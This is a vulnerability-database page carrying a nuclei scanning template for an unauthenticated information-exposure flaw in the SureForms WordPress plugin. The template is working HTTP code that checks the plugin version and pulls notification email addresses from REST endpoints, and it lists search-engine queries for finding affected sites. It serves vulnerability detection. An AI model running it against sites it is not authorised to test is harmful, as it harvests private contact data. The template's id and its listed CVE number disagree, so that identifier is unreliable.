Lucene search
K

SureForms <= 1.13.1 - Sensitive Information Exposure

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

SureForms WordPress plugin up to 1.13.1 exposes sensitive email data via unauthenticated access.

Related
Refs
Code
id: CVE-2025-12536

info:
  name: SureForms <= 1.13.1 - Sensitive Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    SureForms WordPress plugin <= 1.13.1 contains a sensitive information exposure caused by setting 'auth_callback' to '__return_true' in '_srfm_email_notification' post meta registration, letting unauthenticated attackers access sensitive email notification data, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access sensitive email notification configurations, potentially leading to data leakage and abuse of downstream systems.
  remediation: |
    Update to the latest version beyond 1.13.1.
  reference:
    - https://patchstack.com/database/wordpress/plugin/sureforms/vulnerability/wordpress-sureforms-plugin-1-13-1-unauthenticated-sensitive-information-exposure-vulnerability
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sureforms/sureforms-1131-missing-authorization-to-unauthenticated-sensitive-information-exposure
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-14437
    epss-score: 0.00757
    epss-percentile: 0.50779
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 3
    vendor: brainstormforce
    product: sureforms
    framework: wordpress
    shodan-query: 'http.html:"/wp-content/plugins/sureforms/"'
    fofa-query: body="/wp-content/plugins/sureforms/"
    publicwww-query: "/wp-content/plugins/sureforms/"
  tags: cve,cve2025,wordpress,wp-plugin,sureforms,exposure,wp,

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/sureforms/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "SureForms")'
          - compare_versions(version, '<= 1.13.1')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - '(?i)Stable.tag:\s?([\w.]+)'
        internal: true

  - raw:
      - |
        GET /{{route}} HTTP/1.1
        Host: {{Hostname}}

    attack: clusterbomb
    payloads:
      route:
        - "wp-json/wp/v2/sureforms_form"
        - "?rest_route=/wp/v2/sureforms_form"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: content_type
        words:
          - "application/json"

      - type: word
        part: body
        words:
          - "_srfm_email_notification"
          - "sureforms_form"
        condition: and

      - type: word
        part: body
        words:
          - "email_to"
          - "email_cc"
          - "email_bcc"
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: email_to
        part: body
        group: 1
        regex:
          - '"email_to"\s*:\s*"([^"]+)"'

      - type: regex
        name: email_cc
        part: body
        group: 1
        regex:
          - '"email_cc"\s*:\s*"([^"]+)"'

      - type: regex
        name: email_bcc
        part: body
        group: 1
        regex:
          - '"email_bcc"\s*:\s*"([^"]+)"'
# digest: 4a0a00473045022100a7b687e5cb6f2e344da02ba90721dbcf345b8a1ecf45e4ba22aa811f1a3138da022051ced67e3b78f6627246dec68ba876971d35fa96da74044af60a8ed98c456fc2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Apr 2026 18:08Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.17.5
EPSS0.01986
SSVC
8